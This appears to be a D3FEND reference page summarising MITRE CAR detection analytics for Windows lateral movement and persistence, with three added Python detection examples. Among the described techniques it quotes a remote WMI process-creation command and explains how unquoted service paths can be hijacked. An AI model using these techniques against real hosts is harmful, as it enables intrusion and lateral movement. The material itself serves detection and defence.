  • "The Windows Command Prompt (cmd.exe) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as dir, copy, mkdir, and type, as well as batch scripts (.bat). Typically, when a user runs a command prompt, the parent process is explorer.exe or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process cmd.exe from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of cmd.exe, it may be possible to detect adversaries."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-003: Processes Spawning cmd.exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-003: Processes Spawning cmd.exe"

Usage (5)

kb-abstract

  • "A method of establishing a protected environment within a computing device including validating a kernel component loaded into a kernel of the computing device, establishing a security state for the kernel based on the validation, creating a secure process and loading a software component into the secure process, periodically checking the security state of the kernel, and notifying the secure process when the security state of the kernel has changed."

kb-author

  • "Sumedh Barde, Jonathan Schwartz, Reid Kuhn, Alexandre Grigorovitch, Kirt Debique, Chadd Knowlton, James Alkove, Geoffrey Dunbar, Michael Grier, Ming Ma, Chaitanya Upadhyay, Adil Sherwani, Arun Kishan"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft Technology Licensing LLC"

rdfs:label

  • "Reference - Protected computing environment - Microsoft Technology Licensing LLC"

kb-reference-of

kb-reference-title

  • "Protected computing environment"

Usage (5)

kb-abstract

  • "Qualys Passive Scanning Sensor (PS) continuously monitors all network traffic and flags any asset activity. It identifies and profiles devices the moment they connect to the network, including those difficult to scan, corporate owned, brought by employees, and rogue IT. The data is sent immediately to the Qualys Cloud Platform for centralized analysis."

kb-organization

  • "Qualys"

rdfs:label

  • "Reference - Qualys Network Passive Sensor Getting Started Guide"

kb-reference-of

kb-reference-title

  • "Qualys Network Passive Sensor Getting Started Guide"

Usage (5)

kb-abstract

  • "Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-04-002: Quick execution of a series of suspicious commands - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-04-002: Quick execution of a series of suspicious commands"

Usage (5)

kb-abstract

  • "The Remote Desktop Protocol (RDP), built into Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to laterally move to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-07-002: RDP Connection Detection - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-002: RDP Connection Detection"

Usage (5)

kb-author

  • "D. Harrington, R. Presuhn, B. Wijnen"

kb-organization

  • "Internet Engineering Task Force (IETF)"

rdfs:label

  • "Reference - An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"

kb-reference-of

kb-reference-title

  • "An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"

Usage (5)

kb-abstract

  • "The System for Cross-domain Identity Management (SCIM) specification is designed to manage user identity in cloud-based applications and services in a standardized way to enable interoperability, security, and scalability. The specification suite seeks to build upon experience with existing schemas and deployments, placing specific emphasis on simplicity of development and integration, while applying existing authentication, authorization, and privacy models. The intent of the SCIM specification is to reduce the cost and complexity of user management operations by providing a common user schema and extension model, as well as binding documents to provide patterns for exchanging this schema using standard protocols. In essence, make it fast, cheap, and easy to move users in to, out of, and around the cloud."

kb-author

  • "K. Li, B. Khasnabish, A. Nadalin, Z. Zeltsan"

kb-organization

  • "IETF"

rdfs:label

  • "Reference - RFC 7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"

kb-reference-of

kb-reference-title

  • "RFC7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"

Usage (5)

kb-abstract

  • "A service proxy is described herein. The service proxy is configured to act as an intermediary between a client and a service. The service proxy may observe communications, modify communications, log communications, or the like, particularly so as to enhance the security and reliability of the host device. In some implementations, the service proxy may cooperate with an operating system to take over a named port object. In some implementations, the service proxy may receive messages as an intermediary between the client and the server. In some implementations, the service proxy may attach to a shared memory to intercept communications. In some implementations, the service proxy may be injected into a client process to appear to be the client itself."

kb-author

  • "Ion-Alexandru Ionescu"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - RPC call interception - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "RPC call interception"

Usage (5)

kb-abstract

  • "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-03-001: Reg.exe called from Command Shell - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-03-001: Reg.exe called from Command Shell"

Usage (5)

kb-abstract

  • "A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-005: Remote Desktop Logon - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-005: Remote Desktop Logon"

Usage (5)

kb-abstract

  • "An adversary can remotely manipulate the registry of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a Lateral Movement technique, discover the configuration of a host, achieve Persistence, or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. Although this behavior is disabled in many Windows configurations, it is possible to remotely enable the RemoteRegistry service, which can be detected with CAR-2014-03-005.

    Remote access to the registry can be achieved via

    * Windows API function RegConnectRegistry
    * command line via reg.exe
    * graphically via regedit.exe

    All of these behaviors call into the Windows API, which uses the NamedPipe WINREG over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-005: Remote Registry - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-005: Remote Registry"

Usage (5)

kb-abstract

  • "There are several ways to cause code to execute on a remote host. One of the most common methods is via the Windows Service Control Manager (SCM), which allows authorized users to remotely create and modify services. Several tools, such as PsExec, use this functionality.

    When a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the RPC Endpoint Mapper over 135/tcp. This handles authentication, and tells the client what port the endpoint--in this case the SCM--is listening on. Then, the client connects directly to the listening port on services.exe. If the request is to start an existing service with a known command line, the SCM process will run the corresponding command.

    This compound behavior can be detected by looking for services.exe receiving a network connection and immediately spawning a child process."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-005: Remotely Launched Executables via Services - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-03-005: Remotely Launched Executables via Services"

Usage (5)

kb-abstract

  • "Adversaries can use Windows Management Instrumentation (WMI) to move laterally by launching executables remotely. For adversaries to achieve this, they must open a WMI connection to a remote host. This RPC activity is currently detected by CAR-2014-11-007. After the WMI connection has been initialized, a process can be remotely launched using the command: wmic /node:"<hostname>" process call create "<command line>", which is detected via CAR-2016-03-002.

    This leaves artifacts at both a network (RPC) and process (command line) level. When wmic.exe (or the schtasks API) is used to remotely create processes, Windows uses RPC (135/tcp) to communicate with the remote machine.

    After RPC authenticates, the RPC endpoint mapper opens a high port connection, through which the schtasks Remote Procedure Call is actually implemented. With the right packet decoders, or by looking for certain byte streams in raw data, these functions can be identified.

    When the command line is executed, it has the parent process of C:\windows\system32\wbem\WmiPrvSE.exe. This analytic looks for these two events happening in sequence, so that the network connection and target process are output."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-12-001: Remotely Launched Executables via WMI - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-12-001: Remotely Launched Executables via WMI"

Usage (5)

kb-abstract

  • "An adversary can move laterally using the schtasks command to remotely schedule tasks. Although these events can be detected with command line analytics CAR-2013-08-001, it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as PowerShell. In these cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established (CAR-2014-05-001), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.

    Certain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats

    * UUID 86d35949-83c9-4044-b424-db363231fd0c (decoded)
    * Hex 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c (raw)
    * ASCII IYD@$621 (printable bytes only)

    This identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks"
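Added worked example (not part of this D3FEND page nor of the CAR analytic it cites): the three forms of the ITaskSchedulerService interface UUID quoted above are one and the same 16 bytes. The Python below derives the raw on-wire form and the printable-only form from the decoded UUID and then locates every occurrence in a byte stream, which is what a raw-bytes sensor implementing the analytic has to do. Only the UUID comes from the page; the sample stream and the DCE/RPC bind header prefix placed in it are constructed stand-ins, not a real capture.

```python
import uuid
from typing import List

# Interface UUID of ITaskSchedulerService, as quoted in CAR-2015-04-002.
ITASKSCHEDULER_UUID = "86d35949-83c9-4044-b424-db363231fd0c"


def uuid_wire_bytes(text_uuid: str) -> bytes:
    """DCE/RPC on-wire encoding of a UUID.

    NDR serialises the first three fields (32, 16 and 16 bits) little-endian
    and the remaining 8 bytes as-is, which is exactly what uuid.UUID.bytes_le
    produces. This maps the 'decoded' form to the 'raw' form in the analytic.
    """
    return uuid.UUID(text_uuid).bytes_le


def printable_signature(raw: bytes) -> str:
    """Printable-ASCII-only view of the raw bytes: the form a strings-based
    sensor would carve out of the stream."""
    return "".join(chr(b) for b in raw if 0x20 <= b < 0x7F)


def find_interface_refs(stream: bytes, text_uuid: str = ITASKSCHEDULER_UUID) -> List[int]:
    """Byte offsets of every occurrence of the interface UUID in `stream`."""
    needle = uuid_wire_bytes(text_uuid)
    offsets, pos = [], stream.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = stream.find(needle, pos + len(needle))
    return offsets


def build_sample_stream() -> bytes:
    """Constructed stand-in for the request phase of a remote schtasks call:
    three fragments carrying the interface UUID, separated by filler bytes.
    Only the UUID bytes are authentic; the 8-byte prefix merely resembles a
    DCE/RPC v5 bind header (version, PDU type 11, flags, NDR data rep)."""
    needle = uuid_wire_bytes(ITASKSCHEDULER_UUID)
    bind_hdr = bytes.fromhex("05000b0310000000")
    return (bind_hdr + needle + b"\x00" * 8
            + bind_hdr + needle + b"\x00" * 8
            + needle + b"\x00" * 4)


def main() -> None:
    raw = uuid_wire_bytes(ITASKSCHEDULER_UUID)
    print("decoded :", ITASKSCHEDULER_UUID)
    print("raw     :", " ".join(f"{b:02x}" for b in raw))
    print("ascii   :", printable_signature(raw))
    print("offsets :", find_interface_refs(build_sample_stream()))


if __name__ == "__main__":
    main()
```

Running it prints the raw form 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c and the printable form IYD@$621, matching the analytic, and reports three offsets in the constructed stream. A sensor that only sees reassembled strings should search for the printable form; one with raw payload access should use the 16-byte form, which has far fewer false positives.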

Usage (5)

kb-author

  • "Christopher Dixon, Thomas Pinckney"

rdfs:label

  • "Reference - Reputation of an entity associated with a content item"

kb-reference-of

kb-reference-title

  • "Reputation of an entity associated with a content item"

Usage (5)

kb-author

  • "campus.barracuda.com"

kb-mitre-analysis

  • "Inbound corporate SMTP traffic on port 25 can be routed through Barracuda Email Security Gateway before it reaches the corporate mail server; the gateway acts as a traffic filter based on reverse DNS lookups and a denylist of blocked domains."

rdfs:label

  • "Reference - Reverse DNS Blocking - Barracuda Networks"

kb-reference-of

kb-reference-title

  • "Reverse DNS Blocking"

Usage (5)

kb-abstract

  • "Adversaries may find it necessary to use Dynamic-link Libraries (DLLs) to evade defenses. One way these DLLs can be "executed" is through the use of the built-in Windows utility RunDLL32, which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-006: RunDLL32.exe monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-03-006: RunDLL32.exe monitoring"

Usage (5)

kb-abstract

  • "When /SAFESEH is specified, the linker will only produce an image if it can also produce a table of the image's safe exception handlers. This table specifies for the operating system which exception handlers are valid for the image."

kb-author

  • "Mike Blome, Saisang Cai, Colin Robertson, Mike Jones, NextTurn, Gordon Hogenson"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - /SAFESEH (Image has Safe Exception Handlers) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/SAFESEH (Image has Safe Exception Handlers)"

Usage (5)

kb-abstract

  • "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by CAR-2013-05-003). Then, a variety of Execution techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.

    This can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. %SYSTEMROOT%\system32) to gain a higher detection rate."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-005: SMB Copy and Execution - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-005: SMB Copy and Execution"
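Added worked example (not part of this D3FEND page or of MITRE CAR): both CAR-2014-03-005 (services.exe receives a connection and immediately spawns a child) and CAR-2013-05-005 (a file written over SMB is later executed on that host) are the same detection shape, a second event following a first event on a shared key within a time window. The Python below implements that correlator once and applies it to both analytics over a constructed event set. The event field names, the 2-second and 24-hour windows, and the host names are assumptions; real telemetry would be mapped into this shape first.

```python
import ntpath
from datetime import datetime, timedelta
from typing import Dict, Hashable, List, Tuple

Event = Dict[str, object]


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def _name(p: object) -> str:
    """Lower-cased file name of a Windows path or share path."""
    return ntpath.basename(str(p)).lower()


# Constructed sample telemetry (not real logs). HOST-A writes tool.exe to the
# ADMIN$ share of HOST-B (which maps to C:\Windows); HOST-B's services.exe
# then accepts a connection and spawns that file half a second later.
# HOST-C shows a normal service start minutes after an unrelated connection,
# which must not fire.
SAMPLE_EVENTS: List[Event] = [
    {"time": _t("2024-03-01T10:00:00"), "kind": "smb_write", "src": "HOST-A",
     "host": "HOST-B", "file": r"\ADMIN$\tool.exe"},
    {"time": _t("2024-03-01T10:00:02"), "kind": "net_conn", "host": "HOST-B", "src": "HOST-A",
     "image": r"C:\Windows\System32\services.exe", "dst_port": 49155},
    {"time": _t("2024-03-01T10:00:02.500"), "kind": "proc_create", "host": "HOST-B",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\tool.exe", "cmdline": r"C:\Windows\tool.exe -s"},
    {"time": _t("2024-03-01T11:00:00"), "kind": "net_conn", "host": "HOST-C", "src": "HOST-A",
     "image": r"C:\Windows\System32\services.exe", "dst_port": 49160},
    {"time": _t("2024-03-01T11:05:00"), "kind": "proc_create", "host": "HOST-C",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]


def correlate(events, is_first, is_second, key_first, keys_second, window) -> List[Tuple[Event, Event]]:
    """Pair each `second` event with the most recent `first` event that shares
    one of its keys and happened no more than `window` earlier."""
    latest: Dict[Hashable, Event] = {}
    pairs: List[Tuple[Event, Event]] = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if is_first(e):
            latest[key_first(e)] = e
        if is_second(e):
            for k in keys_second(e):
                a = latest.get(k)
                if a is not None and timedelta(0) <= e["time"] - a["time"] <= window:
                    pairs.append((a, e))
                    break
    return pairs


def remote_service_launches(events, window=timedelta(seconds=2)):
    """CAR-2014-03-005: services.exe accepts a network connection, then spawns a child."""
    return correlate(
        events,
        is_first=lambda e: e["kind"] == "net_conn" and _name(e.get("image")) == "services.exe",
        is_second=lambda e: e["kind"] == "proc_create" and _name(e.get("parent_image")) == "services.exe",
        key_first=lambda e: e["host"],
        keys_second=lambda e: [e["host"]],
        window=window,
    )


def smb_copy_and_execute(events, window=timedelta(hours=24)):
    """CAR-2013-05-005: a file written over SMB is later run on that host,
    either as the process image or as a command-line argument."""
    return correlate(
        events,
        is_first=lambda e: e["kind"] == "smb_write",
        is_second=lambda e: e["kind"] == "proc_create",
        key_first=lambda e: (e["host"], _name(e["file"])),
        keys_second=lambda e: [(e["host"], _name(e["image"]))]
        + [(e["host"], _name(tok)) for tok in str(e["cmdline"]).split()],
        window=window,
    )
```

On the sample set each analytic yields exactly one pair, both on HOST-B, and the HOST-C service start is ignored because the spawn falls outside the short window. The window lengths are the tuning knob: the services.exe case needs a tight one because the spawn is immediate, while the SMB copy case tolerates hours because execution may follow staging much later.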

Usage (5)

kb-abstract

  • "Server Message Block (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve Lateral Movement. Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.

    Output Description:
    The source, destination, content, and time of each event."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-01-003: SMB Events Monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-01-003: SMB Events Monitoring"

Usage (5)

kb-abstract

  • "Account usage within SMB can be used to identify compromised credentials, and the hosts accessed with them.

    This analytic monitors SMB activity that deals with user activity rather than file activity."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-09-003: SMB Session Setups - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-09-003: SMB Session Setups"

Usage (5)

kb-abstract

  • "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.

    Monitoring SMB write requests still creates some noise, particularly with named pipes. As a result, SMB is now split between writing named pipes and writing other files."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-001: SMB Write Request - NamedPipes - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-03-001: SMB Write Request - NamedPipes"

Usage (5)

kb-abstract

  • "As described in CAR-2013-01-003, SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in Exfiltration or as a Lateral Movement technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-05-003: SMB Write Request - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-05-003: SMB Write Request"

Usage (5)

kb-abstract

  • "SNMP, or Simple Network Management Protocol, is a protocol and a standard that is supported by just about any managed network-connected hardware. There are three widely deployed versions: SNMP v1, v2c (most commonly used), and v3. SNMP is typically utilized read-only, but supports read/write, and by default utilizes port 161. SNMP exposes management data in the form of ‘variables’, which are organized in what is known as a MIB, or “Management Information Base”. A MIB essentially describes the variables available on a given system, each of which can be remotely queried via SNMP."

kb-organization

  • "Device 42"

rdfs:label

  • "Reference - SNMP - Network Auto-Discovery"

kb-reference-of

kb-reference-title

  • "SNMP - Network Auto Discovery"

Usage (5)

kb-abstract

  • "A credential caching system includes receiving a set of authentication credentials, storing the set of authentication credentials in a credential cache memory, wherein the credential cache memory is coupled with a management controller, and supplying the set of authentication credentials for automatic authentication during a reset or reboot. In the event of a security breach, the credential caching system clears the set of authentication credentials from the credential cache memory so that the set of authentication credentials may no longer be used for a reset or reboot."

kb-author

  • "Muhammed K. Jaber, Mukund P. Khatri, Kevin T. Marks, Don Charles McCall"

kb-mitre-analysis

  • ""

kb-organization

  • "Dell Products LP"

rdfs:label

  • "Reference - Secure caching of server credentials - Dell Products LP"

kb-reference-of

kb-reference-title

  • "Secure caching of server credentials"

Usage (5)

kb-abstract

  • "The example implementation demonstrates the ability to perform passive inspection of encrypted TLS connections. The question of whether or not to perform such an inspection is complex. There are important tradeoffs between traffic security and traffic visibility that each organization should consider. Some organizations prefer to decrypt internal TLS traffic, so it can be inspected to detect attacks that may be hiding within encrypted connections. Such inspection can detect intrusion, malware, and fraud, and can conduct troubleshooting, forensics, and performance monitoring. For these organizations, TLS inspection may serve as both a standard practice and a critical component of their threat detection and service assurance strategies."

kb-author

  • "NIST"

rdfs:label

  • "Reference - Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"

kb-reference-of

kb-reference-title

  • "Securing Web Transactions TLS Server Certificate Management - Appendix A Passive Inspection"

Usage (5)

kb-abstract

  • "A security system with methodology for interprocess communication control is described. In one embodiment, a method for controlling interprocess communication is provided that includes steps of: defining rules indicating which system services a given application can invoke; trapping an attempt by a particular application to invoke a particular system service; identifying the particular application that is attempting to invoke the particular system service; and based on identity of the particular application and on the rules indicating which system services a given application can invoke, blocking the attempt when the rules indicate that the particular application cannot invoke the particular system service."

kb-author

  • "Gregor Freund"

kb-mitre-analysis

  • "This patent describes a technique for monitoring interprocess communications to prevent malicious applications from requesting system services. API calls are monitored to detect malicious applications attempting to open a communication channel (port) to access system services or sending messages to other applications using user32 API functions. These requests are examined against an external rules engine or whitelist; on a match the request is denied or blocked and an error message such as connection refused or service not available is returned."

kb-organization

  • "Check Point Software Tech Inc"

rdfs:label

  • "Reference - Security System with Methodology for Interprocess Communication Control - Check Point Software Tech Inc"

kb-reference-of

kb-reference-title

  • "Security System with Methodology for Interprocess Communication Control"

Usage (5)

kb-abstract

  • "Security vulnerability information aggregation techniques are disclosed. Vulnerability information associated with one or more security vulnerabilities is obtained from multiple sources and aggregated into respective unified vulnerability definitions for the one or more security vulnerabilities. Aggregation may involve format conversion, content aggregation, or both in some embodiments. Unified vulnerability definitions may be distributed to vulnerability information consumers in accordance with consumer-specific policies. Storage of vulnerability information received from the sources may allow the aggregation process to be performed on existing vulnerability information “retro-actively”. Related data structures and Graphical User Interfaces (GUIs) are also disclosed."

kb-author

  • "Christophe Gustave, Stanley Taihai Chow, Douglas Wiemer"

kb-organization

  • "Nokia Technologies Oy"

rdfs:label

  • "Reference - Security vulnerability information aggregation"

kb-reference-of

kb-reference-title

  • "Security vulnerability information aggregation"

Usage (5)

kb-abstract

  • "Adversaries may modify the binary file for an existing service to achieve Persistence while potentially evading defenses. If a newly created or modified binary runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-02-001: Service Binary Modifications - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-02-001: Service Binary Modifications"

Usage (5)

kb-abstract

  • "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2013-09-005: Service Outlier Executables - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-09-005: Service Outlier Executables"

Usage (5)

kb-abstract

  • "According to ATT&CK, an adversary may escalate privileges by intercepting the search path for legitimately installed services. As a result, Windows will launch the target executable instead of the desired binary and command line. This can be done when there are spaces in the binary path and the path is unquoted. Search path interception should never happen legitimately and will likely be the result of an adversary abusing a system misconfiguration. With a few regular expressions, it is possible to identify the execution of services with intercepted search paths."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-07-001: Service Search Path Interception - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-07-001: Service Search Path Interception"
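Added worked example (not part of this D3FEND page or of MITRE CAR): the misconfiguration behind search path interception is a service ImagePath that is unquoted and contains spaces, so CreateProcess tries shorter candidate paths before the intended binary. The Python below classifies service ImagePath values, enumerates the candidate paths an attacker could plant, and flags a process started under services.exe whose image is one of those candidates. The service table is constructed; real data would come from the Services registry key or a process-creation feed.

```python
import re
from typing import Dict, List, Optional

# Constructed service table (not real registry data): service name -> the
# ImagePath value as it would appear under HKLM\SYSTEM\CurrentControlSet\Services.
SAMPLE_SERVICES: Dict[str, str] = {
    "GoodSvc": r'"C:\Program Files\Vendor Tools\agent.exe" -run',
    "QuietSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "WeakSvc": r"C:\Program Files\Acme Suite\bin\acmesvc.exe --service",
}

# Executable portion of an unquoted command line: everything up to the first
# ".exe" that is followed by whitespace or the end of the string.
_UNQUOTED_EXE = re.compile(r"^(?P<exe>.+?\.exe)(?:\s|$)", re.IGNORECASE)


def executable_of(image_path: str) -> Optional[str]:
    """Executable portion of an unquoted ImagePath, or None when the path is
    quoted (resolved exactly, so not interceptable) or does not parse."""
    if image_path.startswith('"'):
        return None
    m = _UNQUOTED_EXE.match(image_path)
    return m.group("exe") if m else None


def is_interceptable(image_path: str) -> bool:
    """True for the misconfiguration the analytic targets: unquoted path with spaces."""
    exe = executable_of(image_path)
    return exe is not None and " " in exe


def intercept_candidates(exe_path: str) -> List[str]:
    r"""Binaries CreateProcess would try, in order, before the intended one.

    For C:\Program Files\Acme Suite\bin\acmesvc.exe Windows tries
    C:\Program.exe, then C:\Program Files\Acme.exe, then the real path.
    """
    parts = exe_path.split(" ")
    cands = []
    for i in range(1, len(parts)):
        cand = " ".join(parts[:i])
        if not cand.lower().endswith(".exe"):
            cand += ".exe"
        cands.append(cand)
    return cands


def audit_services(services: Dict[str, str]) -> List[str]:
    """Names of services whose ImagePath is unquoted and contains spaces."""
    return [name for name, path in services.items() if is_interceptable(path)]


def detect_interception(services: Dict[str, str], executed_image: str) -> Optional[str]:
    """Given the image path of a process started under services.exe, return the
    name of the service whose search path it intercepted, or None."""
    wanted = executed_image.lower()
    for name, path in services.items():
        exe = executable_of(path)
        if exe is None or " " not in exe:
            continue
        if wanted in (c.lower() for c in intercept_candidates(exe)):
            return name
    return None


if __name__ == "__main__":
    print("interceptable services:", audit_services(SAMPLE_SERVICES))
    for svc in audit_services(SAMPLE_SERVICES):
        print(svc, "->", intercept_candidates(executable_of(SAMPLE_SERVICES[svc]) or ""))
    print("hit:", detect_interception(SAMPLE_SERVICES, r"C:\Program Files\Acme.exe"))
```

audit_services is the preventive check (fix the quoting before anyone plants a binary); detect_interception is the analytic, and only fires when the executed image is one of the shorter candidate paths, so the legitimate acmesvc.exe start is not reported.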

Usage (5)

kb-abstract

  • "Windows runs the Service Control Manager (SCM) within the process services.exe. Windows launches services as independent processes or DLL loads within a svchost.exe group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point SvcMain. If an application does not have the entry point, then it will time out (default is 30 seconds) and the process will be killed.

    To survive the timeout, adversaries and red teams can create services that direct to cmd.exe with the flag /c, followed by the desired command. The /c flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain Persistence and Privilege Escalation."

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - CAR-2014-05-002: Services launching Cmd - MITRE"

